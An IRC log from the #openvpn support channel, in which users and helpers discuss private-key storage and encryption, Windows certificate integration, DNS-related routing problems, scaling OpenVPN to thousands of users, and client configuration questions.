has joined #openvpn 01:20 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 255 seconds] 01:28 -!- UberDuper [~UberDuper@wsip-174-77-66-158.ph.ph.cox.net] has quit [Read error: Connection reset by peer] 01:28 -!- UberDuper [~UberDuper@wsip-174-77-66-158.ph.ph.cox.net] has joined #openvpn 01:38 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn 01:44 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds] 01:51 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn 01:52 -!- b1rkh0ff [~b1rkh0ff@178.77.1.200] has joined #openvpn 01:57 -!- ade_b [~Ade@109.58.215.97.bredband.tre.se] has joined #openvpn 01:57 -!- ade_b [~Ade@109.58.215.97.bredband.tre.se] has quit [Changing host] 01:57 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:02 -!- tuxick [~userMurf@tuxick.xs4all.nl] has left #openvpn [] 02:04 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 245 seconds] 02:05 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 02:07 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 02:07 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Remote host closed the connection] 02:11 -!- joako [~joako@opensuse/member/joak0] has joined #openvpn 02:12 < joako> Is there any way I can fully intergrate the OpenVPN client with Windows, so the user doesn´t need to type their password twice? 02:15 <+pekster> joako: Not really. You might be able to use some creative PKCS11 (ie: smart card) sceniaro if you're already using smartcards to log users in locally 02:16 < joako> What if I set it up with certificates only? Could I issue the certificates automatically through Windows and load the CA into OpenVPN server? 02:17 <+pekster> Optionally, you could store the required password somewhere that uses whatever programming APIs Windows gives you to decrypt it and pass it back on the management interface. An inferior version of that approach is to store the password in plaintext inside an EFS or bitlocker-protected folder, but that's usually a bad idea since any malware would have access to the decrypted version 02:17 <+pekster> joako: Same problem, basically, unless you're willing to keep unencrypted private keys on the laptop (which is trivial for an attacker who knows what they're doing to swipe from a non-disk-encrypted PC in just a couple of minute) 02:17 -!- joako_ [~joako@opensuse/member/joak0] has joined #openvpn 02:18 <+pekster> Traditionally, you encrypt the private key so such compromise as I noted above doesn't occur due to exposure of the key file 02:21 < joako_> I don´t know how Windows handles storing the certificates -- and quite frankly I don´t care. Could OpenVPN use the certificates stored in Windows directly? 02:21 -!- joako [~joako@opensuse/member/joak0] has quit [Ping timeout: 245 seconds] 02:22 <+pekster> No 02:23 <+pekster> OpenVPN does not use the "Certificate Manager" keystore 02:23 <+pekster> It supports only keypairs via flat-files and PKCS11 providers 02:27 < joako_> Actually I am reading here and it does appear possible. The only issue would be to generate a cryptoapicert that would be universal to all machines 02:28 < kunji> joako: mind linking what you're reading? 02:28 <+pekster> joako_: Oh, I stand corrected. See the --cryptoapicert option in the manpage 02:29 < joako_> 1) http://serverfault.com/questions/38528/openvpn-with-a-windows-certificate-services-pki 2) http://www.mentby.com/Group/openvpn-users/cryptoapicert-and-windows-7.html etc 02:29 <@vpnHelper> Title: vpn - OpenVPN with a Windows Certificate Services PKI - Server Fault (at serverfault.com) 02:31 <+pekster> joako_: So, you can import the pkcs12 file containing both keys. I don't know what you're going on about generating a universal cert, because that doesn't appear to be required or something you'd want in such a setup 02:32 < joako_> pekster: No I would deploy the certificate through Windows autoenrollment but I would need the OpenVPN configuration to be idential for every machine so I don´t need to manage that 02:33 <+pekster> That gets a little messy, because *all* certs signed by the CA (even the ones for computer$ accounts, etc) will be seen as valid accounts. Additionally, since you presumably don't generate CRLs every time you un-join a computer or remove an AD user, old keypairs from terminated employees would be valid VPN credentials 02:33 <+pekster> You could do some magic on the server-side I suppose via ccd files or using the key subject or fingerprint or something, but that sounds like a lot of work on your end to code that 02:34 <+pekster> Maybe you can get Windows auto-enrollment to use a special CA with a PKI specifically for VPN access, but you still need to deal with revocation or otherwise verifying a cert belongs to an active user that should have access 02:35 <+pekster> I have very limited experience with server-side certificate services in AD 02:38 <+pekster> joako_: Oh, and see the note in your 2nd link too about the scope of the program execution; normal users (even when they are "administrators") under UAC can't add routes, so OpenVPN runs as the actual 'administrator' user. Choices to get around that are 1) disable UAC or 2) as the reply there suggests, add the keypair to the 'administrator' keystore on the PC, not the user keystore (which probably screws up your auto-enrollment options) 02:38 <+pekster> How's that for some required reading? ;) 02:40 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 02:43 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 256 seconds] 02:43 < kunji1> Hmm, I don't know the application here exactly, but would it be acceptable to just not use passwords? Windows will be doing your security, so if they can login then they can get on the VPN right? So then, why not just use certs without passwords? I'm new to VPN, so.. don't bash this noob too hard :P 02:43 <+pekster> kunji1: What do you mean "windows will be doing your security" ? 02:44 <+pekster> You either need to auth users by --auth-user-pass-verify or by X509 02:45 <+pekster> Yes, you can use X509 via PKCS11 or the cryptoapicert features, but I just identified all the compilicating factors with the cryptoapicert features on recent (>=Vista) versions 02:46 <+pekster> kunji1: Unless you mean leave the key unencrypted on the hard disk. Ask your friendly neighborhood hacker you trust to show you how fast they can pull files off your hard disk some time ;) 02:47 <+pekster> (malware is also a threat, even if you do bitlocker encryption of your disk, so no trying to squirm out on that technicality either) 02:47 <+pekster> Java 0-day anyone? ;) 02:48 < kunji1> pekster: mind going through the standard process real quick for me then? I was likening it to passwordless ssh setup in my head, but that may not be applicable here. 02:49 < joako_> So then OpenVPN is not secure? 02:50 < kunji1> joako_: It's secure, unless you really botch your config. 02:51 < joako_> kunji1: I currently have a standard config and the keys are just stored on my hard drive 02:53 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 245 seconds] 02:53 < kunji1> joako_: Well, thing about that is as, pekster was saying, is that the security is only as good as that of your OS in that situation. 02:56 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 03:00 <+pekster> kunji1: you mean pubkey ssh auth? OpenVPN's X509 support is exactly like that, except it uses X509 for deligating trust 03:00 <+pekster> CryptoAPI just keep the plaintext cert in the keystore and encrypts it itself 03:01 <+pekster> It's a fine way to store it (provided you trust the encryption and SSO scheme it uses) but the issue is generating it automatically to the keystore and calling it for OpenVPN 03:01 < kunji1> pekster: Hmm, so you're fine as long as your files are secure, of course this becomes much harder as soon as we're not just talking about my files, but everyone at a company... and on windows as well. 03:02 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 03:02 <+pekster> kunji1: What are you going on about? Yes, files can be stolen a variety of ways, even more so from unencrypted disks. This is why your ssh private key is encrypted with a passphrase, and so should your on-disk OpenVPN keys 03:04 < kunji1> pekster: I'm referring to the case where you need to automate ssh communication between servers. 03:05 <+pekster> Then yes, if you're doing that non-interactively you need to store unencrypted keys somewhere, or store the decryption password in plaintext somewhere (not really any better) 03:06 <+pekster> Hopefully people doing that have hardened their systems as possible and limited the ssh key usage on the remote end to the specific command that it needs to perform (as is the recommendation) 03:13 < kunji1> pekster: Yes indeed, that's something I'm much more familiar with than vpn. Hmm, ... the openvpn documentation could really have been more explicit about that, it's mentioned in a pretty nonchalant manner (about passwords). Same for the Ubuntu documentation on installing openvpn.... I don't think that mentions it at all. 03:13 <+pekster> Same with ssh, if you get down to it. If you're handling private keys or pkcs12 files, you presumably know whwat you're doing 03:14 <+pekster> It's rare to find an average user who knows how to use 'openssl rsa' commands that is completely ignorant of what they're doing 03:16 -!- Castorrr [Castor_@CPE-72-133-200-232.wi.res.rr.com] has quit [] 03:33 < kunji1> pekster: .. so I'm still missing the part where we decided RAM is so secure if the HD isn't... 03:36 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:37 -!- joako_ [~joako@opensuse/member/joak0] has quit [Ping timeout: 245 seconds] 03:37 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 03:43 <+pekster> kunji1: RAM can't be (easily) attacked offline 03:44 <+pekster> If you power off, the RAM is dead. The encrypted cert is save, provided it's encrypted such that brute-force is non-trivial 03:44 <+pekster> Boom. Next security problem? 03:45 <+pekster> (and honestly, if you're worried about someone flash-freezing your DRAM chips, you should keep your laptop on you at all times and a loaded firearm in your hand) 03:45 <+pekster> !shotgun 03:45 <@vpnHelper> "shotgun" is (#1) the most effective form of physical security or (#2) shotgun security? If you try to physically attack my network, I chase you with a shotgun. 03:45 < kunji1> Of course, I was assuming online, offline is possible, but as you say, it's nontrivial. 03:45 <+pekster> keys aren't kept in RAM unless you specify --persist-key 03:45 <+pekster> They're re-read from disk each tiem they're required 03:46 <+pekster> (session keys are of course in RAM, but those rotate hourly by default) 03:48 < kunji1> Hmm, they're read into RAM though right, when required, and then that RAM is freed or overwritten? 03:52 < con3x> What is a good channel to ask a question about kernel routes. Some of my routes seem to be ignored and the default route is taken. 03:53 < con3x> I'm sure the routes are set up correctly and they appear to work in some cases, enough to start watching a video on netflix. 03:53 < kunji1> ##networking is a good place to ask, make sure to post your routes for them, and what ones seem to be ignored. 03:53 < con3x> Thanks :) 03:56 -!- Minnebo [~Minnebo@78-20-135-159.access.telenet.be] has joined #openvpn 04:01 < kunji1> pekster: Shotgun approach is nice :P About the flash freezing, well there's easier ways to get at the RAM, it does need to be an initially powered on system (assume locked or whatnot), but depending on exactly what hardware it is (and even the luck of manufacturing tolerances really) it can be possible to reboot the machine and get a good dump of the RAM contents to say a USB. This is of course typically easy to stop by not having the c 04:02 <+pekster> Sure. I'm unclear how this has to do with not storing your plaintext key on a disk somewhere 04:02 -!- joako_ [~joako@99-153-161-249.lightspeed.miamfl.sbcglobal.net] has joined #openvpn 04:02 -!- joako_ [~joako@99-153-161-249.lightspeed.miamfl.sbcglobal.net] has quit [Changing host] 04:02 -!- joako_ [~joako@opensuse/member/joak0] has joined #openvpn 04:02 <+pekster> OpenVPn can't protect you from RAM-reading attacks (online or offline.) OpenVPN can leverage openssl's ability to decrypt RSA keys on the fly, however 04:04 -!- Minnebo_ [~Minnebo@78-20-132-224.access.telenet.be] has joined #openvpn 04:04 -!- Minnebo [~Minnebo@78-20-135-159.access.telenet.be] has quit [Ping timeout: 240 seconds] 04:04 <+pekster> It's the difference between leaving your housekey on top of your doormat and putting it in one of those locked key boxes for the realitor to access 04:04 <+pekster> Pick how you want to secure access to your network ;) 04:05 < kunji1> pekster: It doesn't at this point, not precisely. I was tending towards saying that RAM and HD security is not terribly different, but I suppose I see the point in the case of say theft or misplacement of devices. 04:06 -!- Minnebo__ [~Minnebo@78-20-132-224.access.telenet.be] has joined #openvpn 04:06 <+pekster> Or a java 0-day that breaks out of its sandbox and copys your c:\secret\my-unencrypted-key.key file to a dropbox account 04:06 < kunji1> Hmm, I like the analogy :P, can't I take my key with me T.T 04:06 <+pekster> That's much less bad than if your key was encrypted 04:06 <+pekster> w/than if/when/ 04:07 <+pekster> s@w/@s/@ 04:07 <+pekster> :( 04:07 <+pekster> Stealing files isn't just for physical theft anymore! ;) 04:08 * Wintereise steals pekster. 04:08 <+pekster> I'd better revoke my certificate and publish a CRL for myself :P 04:08 < kunji1> Yeah, I need to sleep... that's what I'm going to blame for whenever I say something stupid in here (it is 5 A.M. where I am). 04:08 < Wintereise> :x 04:09 -!- Minnebo_ [~Minnebo@78-20-132-224.access.telenet.be] has quit [Ping timeout: 245 seconds] 04:09 < con3x> Got no response in #networking :( so: 04:09 < con3x> Hello there, I'm having a small problem with routes, I'm trying 04:09 < con3x> to route certain ip addresses through an OpenVPN server, but 04:09 < con3x> some aren't actually passing through and are just going out over 04:09 < con3x> the default gateway; here is the output of ip route show: 04:09 < con3x> http://pastebin.com/z0KtdEAW. Can anybody see and problems with 04:09 < kunji1> I've heard enough about CRL..... stupid vehicular networks 04:10 <+pekster> protip: space after your URLs 04:10 <+pekster> (many consoles like to select-by-word and include them) 04:11 < con3x> I'll keep that in mind :) 04:11 <+pekster> So what, a destination matching one of those routes isn't sent across tun0, I presume? 04:11 < kunji1> Yeah, I never know what to do about the end of the sentence when that happens, usually I end up just leaving out the period altogether. 04:11 <+pekster> Example: http://google.com . More sample info about google goes here 04:11 <@vpnHelper> Title: Google (at google.com) 04:12 < con3x> http://pastebin.com/z0KtdEAW 04:12 <+pekster> Got it ;) 04:12 <+pekster> So, my question? 04:13 < con3x> Yeah, instead it just goes over a default route (if I run traceroute) 04:13 < con3x> I'll run one just now 04:13 <+pekster> Can you verify 'ip route get $target_ip' shows the tun0 exit/src? 04:14 < kunji1> Yeah, pekster, that's what I was asking about the other day, couldn't I just make all the traffic go over the vpn by setting the appropriate routes? 04:14 <+pekster> kunji1: If you can route by destination IP, yes. I forget what your specific issue was 04:14 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn 04:16 < con3x> I think I may have just solved my own problem 04:18 < con3x> Its going out over the WAN, but the IP's seem to be different when I resolve them in python than when I run a traceroute 04:19 <+pekster> round-robbin or low-TTL values will do that; don't rely on DNS in such cases 04:19 <+pekster> (or even a high TTL if the value changes between when you resolve it and the client does so again later) 04:19 <+pekster> IP-based route overrides are the wrong way to do web filtering, if that's your goal 04:21 < con3x> Just trying to get around localization guards for netflix. 04:22 <+pekster> Web proxy too hard? 04:23 <+pekster> I *think* silverlight respects the browser proxy setting (it'd have to for locations that require a proxy for outbound Internet access at the very least) 04:24 < con3x> Won't work on all the devices in the network :) also I want it to selectivly route so the video images etc come off the CDN 04:25 < kunji1> pekster: Hmm, well I was trying to setup a bridged connection to that effect. I was able to try it today outside my network, and it wasn't working... It would connect with no errors, but no traffic was going over the vpn. Tried it again when I got home, but at that point I was inside my network again... so I don't think the return routing for packets was correct for when I'm connecting outside of my network. So I think I needed to add 04:25 <+pekster> Remind me again why you don't just use tun? 04:27 -!- joako_ [~joako@opensuse/member/joak0] has quit [Read error: Connection reset by peer] 04:28 -!- Minnebo__ [~Minnebo@78-20-132-224.access.telenet.be] has quit [Ping timeout: 252 seconds] 04:29 < kunji1> pekster: games, though we were considering a 2 daemon solution, but I'm not sure if it's accessing even the server right now, let alone the internet. That is, it would claim to connect fine, but I'm not able to ping the server or any other machines on the LAN. I've changed some settings, so I'm going to try again tomorrow, and if that doesn't work I'll be bringing the logs etc.. 04:30 < con3x> Apparently the DNS entries for cbp-us.nccp.netflix.com change in seconds 04:30 <+pekster> Ah, k. If you can't ping your LAN, you need to verify the addressing is correct on the client interface, and if it is, check your firewalls and bridge setup for errors. tcpdump/wireshark things liberally if you get stuck 04:31 -!- tMobile4a03 [~T4@n218250229105.netvigator.com] has joined #openvpn 04:31 < con3x> Either that or I'm doing my lookup wrong 04:32 <+pekster> Are you pulling all the A records returned? 04:33 <+pekster> It might still rotate within a larger set of IPs, but I get 8 IPs back for a dig request there 04:34 < con3x> Same here, just looking a little deeper. that domain itself has only a CNAME record 04:34 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has quit [Ping timeout: 252 seconds] 04:34 < con3x> Which as far as I can tell routes to a rotating base of AWS Servers 04:35 < kunji1> Can addressing on the server be incorrect? Because my guess was server addressing, and that's what I tried changing to test tomorrow. firewalls are disabled while testing. The bridge itself appears to be just fine (it comes up without any errors and I can ping everything from that machine). Ah good ol wireshark... I do need to learn how to use that properly, every actual network I'm on they would get really pissed about it though (mai 04:35 < con3x> I might just tell DNSMasq to forward only to those 8 and see how long it works for... 04:35 < con3x> /s/forward/return the ips for 04:37 <+pekster> con3x: Wrong. the CNAME returns multiple A records which you clearly aren't handling 04:37 <+pekster> Now that list could still be part of a larger rotation, but it's not a single IP 04:37 <+pekster> https://pastee.org/2y6f5 04:37 < kunji1> By addressing on the server I mean the ip and range the server pushes to the client. 04:38 <+pekster> kunji1: The client might have failed to apply the fake-DHCP reply. Or the server might not be pasing the options that match your LAN network 04:38 <+pekster> This is why you verify client addressing is correct 04:39 <+pekster> kunji1: Oh, and it also rotates the list of 8 you get back. Yup, you can't do that (as I noted above.) How about a web proxy ;) 04:40 <+pekster> con3x: ^^ that was for you 04:40 <+pekster> It'll work until the TTL expires, or about 60 seconds tops 04:40 <+pekster> ie: don't do that 04:40 < kunji1> Yeah, that second part, it wasn't very clear in what I read that it should match the LAN network, that's what I changed for testing tomorrow, it did report getting an IP, and it was in the configured range, and that did show properly when running ipconfig. 04:42 < con3x> pekster: Sorry, never meant it was a single IP, points towards a domain with 8 A records 04:42 < kunji1> con3x: There's probably an easier solution, but you could probably use snort for that. 04:43 < con3x> https://pastee.org/gevag 04:43 < con3x> and they change really frequently 04:46 -!- Minnebo [~Minnebo@office.exabyte.be] has joined #openvpn 04:48 * con3x writes a script to update routes every 60 seconds, FOR SCIENCE! 04:48 <+pekster> What happens when 1 second after your 1/60s script runs that the TTL expires? 04:49 <+pekster> Don't keep trying to pound a nail in with a fistfull of water. Use a browser proxy 04:49 -!- tMobile4a03 [~T4@n218250229105.netvigator.com] has quit [Read error: Connection timed out] 04:50 < con3x> It won't work for the other devices sadly 04:50 <+pekster> transparent proxying works nicely 04:50 <+pekster> Or put them on a unique subnet and policy route 04:50 <+pekster> Or a handful of smarter chioces 04:50 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has joined #openvpn 04:50 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has quit [Write error: Connection reset by peer] 04:51 < con3x> How would I do that? :) 04:51 <+pekster> A transparent proxy? Plenty of guides online to help 04:51 <+pekster> LARTC is a good place to start if you want to learn about policy routing and split routing: http://lartc.org/howto/ 04:51 <@vpnHelper> Title: Linux Advanced Routing & Traffic Control HOWTO (at lartc.org) 04:52 < con3x> Thanks again :) 04:56 -!- Minnebo [~Minnebo@office.exabyte.be] has quit [Quit: Ik ga weg] 05:34 -!- holmen_ is now known as holmen 05:52 -!- mattock is now known as mattock_afk 05:53 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn 06:05 -!- mattock_afk is now known as mattock 06:10 -!- donhoe [~jeepers@c-69-247-138-234.hsd1.tn.comcast.net] has quit [Ping timeout: 245 seconds] 06:11 -!- donhoe [~jeepers@c-69-247-138-234.hsd1.tn.comcast.net] has joined #openvpn 06:15 -!- donhoe [~jeepers@c-69-247-138-234.hsd1.tn.comcast.net] has quit [Ping timeout: 245 seconds] 06:29 -!- donhoe [~jeepers@31.193.12.99] has joined #openvpn 07:10 -!- dazo_afk is now known as dazo 07:58 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 08:04 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 08:08 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 252 seconds] 08:21 -!- ade_b [~Ade@129.178.182.25] has joined #openvpn 08:21 -!- ade_b [~Ade@129.178.182.25] has quit [Changing host] 08:21 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 08:24 -!- Azrael808 [~peter@212.161.9.162] has quit [Quit: Ex-Chat] 08:52 -!- ade_ [~Ade@129.178.182.25] has joined #openvpn 08:53 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 248 seconds] 08:55 -!- ade_ is now known as ade_b 08:56 -!- ade_b [~Ade@129.178.182.25] has quit [Changing host] 08:56 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 09:00 -!- u0m3_ [~Radu@92.80.72.203] has joined #openvpn 09:01 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 09:03 -!- u0m3 [~Radu@92.80.72.203] has quit [Ping timeout: 248 seconds] 09:04 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Quit: Leaving] 09:20 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 245 seconds] 09:21 -!- ducblangis [~Ducblangi@24-117-207-111.cpe.cableone.net] has joined #openvpn 09:33 -!- s51itxsyc [~s51itxsyc@124.207.123.109] has joined #openvpn 09:35 < s51itxsyc> guys how make it if we have roughly 2000 users online sametime, run them in a single subnet, or split serveral in multi conf files? 09:36 -!- BtbN [~btbn@btbn.de] has quit [Quit: Bye] 09:36 -!- BtbN [~btbn@btbn.de] has joined #openvpn 09:45 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 09:45 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 09:47 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit] 09:50 <@ecrist> s51itxsyc: you have that many people connected to openvpn? 09:50 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 09:53 -!- bauruine [~stefan@91.236.116.112] has quit [Quit: Leaving] 09:55 -!- swat [~swat@ubuntu/member/swat] has quit [Quit: Leaving.] 09:55 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 09:58 < ducblangis> Holy.Shit.Man 09:59 < ducblangis> 2000 10:04 <@dazo> s51itxsyc: multiple conf files, on different ports per openvpn instance, but need to be separate (for simplicity in config) VPN subnets, but you can add routes so they can access the subnet(s) they need 10:05 <@dazo> s51itxsyc: but if all in one single subnet is a strict requirement, then there's no other options .... except perhaps switching to TAP and use bridging - but that will fail instantly, due to the massive broadcast traffic 10:06 <@dazo> (you would probably need between 10 and 20 openvpn instances too, for that amount of users to make it perform reasonably well if all clients are using all their bandwidth) 10:07 < wh1p> to be honest if your going to role out a vpn to 2000 users i would just not even consider going the open source route 10:07 < wh1p> with stuff like that you need real business support 10:07 <@dazo> wh1p: no problem with open source software in such enterprise setup ... but rather go for the OpenVPN AS Server would be advisable 10:08 < wh1p> it can be done and im not going to stop you but plan it the open source way and then go and plan it the proper way using proprietery cisco, draytek, sonicwall etc etc 10:08 <@dazo> OpenVPN AS is a commercial supported solution by OpenVPN Technologies, though .... 10:09 < wh1p> you will find your life easier, the support better and the service overall will probably be amazing with the proper dsetup in comparison to a home cooked idea 10:09 <@dazo> but my point is that, that doesn't exclude open source (in general) as a viable solution .... as long as you got the support need covered 10:09 < wh1p> my honest opinion is that going opensource is all cool and that but if something goes wrong and you cant fix it yourself, the proper business route with something like that really needs to be there 10:10 <+rob0> Most "real business support" options I see are incredibly lame. But to be fair, I doubt that applies to OpenVPN Technologies. 10:10 <+rob0> If you can't fix it yourself, hire someone who can. 10:11 < wh1p> im not saying dont go open source i lvoe the idea but with something that crucial it seems like it could cause really big problems for staff 10:11 <@dazo> wh1p: so you're saying New York Stock Exchange did a bad move when going for Red Hat Enterprise Linux? 10:11 < wh1p> ^rewad my comment above i love open source and the ideas and contributions behind it 10:11 <@dazo> but open source doesn't mean it's no good support solution around it .... 10:12 <@dazo> even commercial 10:12 < wh1p> but a vpn being the back bone for 2000 machines could be a really critical thjing to business operations 10:14 < wh1p> ok so let me go back to your original question 10:15 <@dazo> well, hardware solutions might be better suited ... but that doesn't mean open source isn't suitable either 10:16 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 10:17 < wh1p> never said it wasnt suitable 10:18 < s51itxsyc> thanks all your comments guys dazo wh1p rob0 :) 10:18 <+rob0> oh, I didn't address the question :) 10:19 <+rob0> The biggest drawback to one server for that many users is the lack of threading support. 10:19 <@dazo> wh1p: you did say this: "a vpn to 2000 users i would just not even consider going the open source route" .... that sounds like you don't find it suitable 10:19 <+rob0> For that reason I would probably break it up into several. 10:21 < wh1p> dazo: i did say that because with something on that scale imho i would not like to be the one support a half baked role out, sure if it was a,ll planned and rolled out properly and had some some of support plan with openvpn it would be great 10:22 -!- master_of_master [~master_of@p57B52905.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 10:23 -!- master_of_master [~master_of@p57B55DD0.dip.t-dialin.net] has joined #openvpn 10:23 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 272 seconds] 10:26 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Ping timeout: 248 seconds] 10:26 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 260 seconds] 10:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 10:34 < con3x> I wrote a script to constantly add the netflix routes to my routing table 10:35 < con3x> Seems to be working good enough :) 10:39 -!- suprsonic [~suprsonic@services.landonsanderson.com] has joined #openvpn 10:39 < suprsonic> what the recommended key length for openssl? 10:41 -!- s34n [~chatzilla@ip-208-76-93-210.mvdsl.com] has joined #openvpn 10:47 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 255 seconds] 10:51 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 240 seconds] 10:59 < s34n> I had a working config for gnome's network manager openvpn plugin on my last computer 10:59 < s34n> When can I find that to copy it to my new computer? 10:59 -!- suprsonic [~suprsonic@services.landonsanderson.com] has left #openvpn [] 11:01 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 11:04 -!- defswork [~andy@141.0.50.105] has joined #openvpn 11:04 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 260 seconds] 11:04 -!- Orbi [~opera@anon-149-21.vpn.ipredator.se] has joined #openvpn 11:06 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 11:10 -!- raidz_away is now known as raidz 11:11 -!- Orbi [~opera@anon-149-21.vpn.ipredator.se] has quit [Ping timeout: 240 seconds] 11:22 < s34n> I'm a little bit confused about the ip addresses requested by the gnome network manager plugin 11:22 < s34n> it wants a gateway, a remote ip address, and a local ip address 11:23 < s34n> I was expecting to provide the address of the vpn server and have my client negotiate things from there with the server 11:23 -!- NChief [tomme@unaffiliated/nchief] has quit [Quit: leaving] 11:24 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn 11:32 < kunji1> I'm a complete noob at OpenVPN, but from the documentation, you should be able to do it that way, maybe not while using the gnome plugin, but then again, I don't remember having to fill out all of that for the plugin either. I thought you give the plugin your openVPN client configuration file, no? 11:34 <+rob0> Well, that's just it. If you're asking Network Manager questions in the #openvpn channel, you might not get much help. 11:34 <+rob0> !notovpn 11:34 <@vpnHelper> "notovpn" is "notopenvpn" is your problem is not about openvpn, and while we try to be helpful, you may have a better chance of finding your answer if you ask your question in a channel related to your problem 11:51 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 264 seconds] 12:15 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has joined #openvpn 12:17 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 12:18 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 12:21 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 12:25 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 12:25 -!- b1rkh0ff [~b1rkh0ff@178.77.1.200] has quit [Ping timeout: 255 seconds] 12:26 -!- Mimiko [~Mimiko@89.28.88.177] has quit [] 12:26 -!- Orbi [~opera@anon-185-138.vpn.ipredator.se] has joined #openvpn 12:28 -!- Hugh_Man [~Hugh_Man@c-68-61-229-187.hsd1.mi.comcast.net] has joined #openvpn 12:29 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 252 seconds] 12:31 -!- izibi [~julian@unaffiliated/izibi] has joined #openvpn 12:32 < izibi> hi. how can i prevent openvpn from creating routes to the tunnel endpoint? 12:33 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn 12:33 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 12:33 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 12:36 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 255 seconds] 12:36 -!- Orbi [~opera@anon-185-138.vpn.ipredator.se] has quit [Ping timeout: 272 seconds] 12:38 -!- s51itxsyc [~s51itxsyc@124.207.123.109] has quit [Ping timeout: 276 seconds] 12:38 -!- b1rkh0ff [~b1rkh0ff@178.77.7.250] has joined #openvpn 12:45 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 12:47 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 256 seconds] 12:54 < izibi> or what would even be better: how can i change the gateway for the route to the tunnel endpoint? 12:59 -!- s34n [~chatzilla@ip-208-76-93-210.mvdsl.com] has quit [Ping timeout: 276 seconds] 13:01 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn 13:02 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 240 seconds] 13:05 -!- brute11k [~brute11k@89.249.235.236] has quit [Ping timeout: 255 seconds] 13:05 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Client Quit] 13:05 -!- brute11k [~brute11k@89.249.235.236] has joined #openvpn 13:07 -!- s34n [~chatzilla@ip-208-76-93-210.mvdsl.com] has joined #openvpn 13:07 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 13:11 -!- Hugh_Man [~Hugh_Man@c-68-61-229-187.hsd1.mi.comcast.net] has quit [Ping timeout: 264 seconds] 13:33 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has joined #openvpn 13:35 < KaiForce> Is there a how-to for multiple simultaneous connections from a windows client? Assuming that is possible, that is. 13:44 <+rob0> I suppose it is, but I don't use Windows. If all of those servers redirect the gateway, it would be rather ugly, of course. If they're just to connect to that site/LAN, however, it should be no problem. 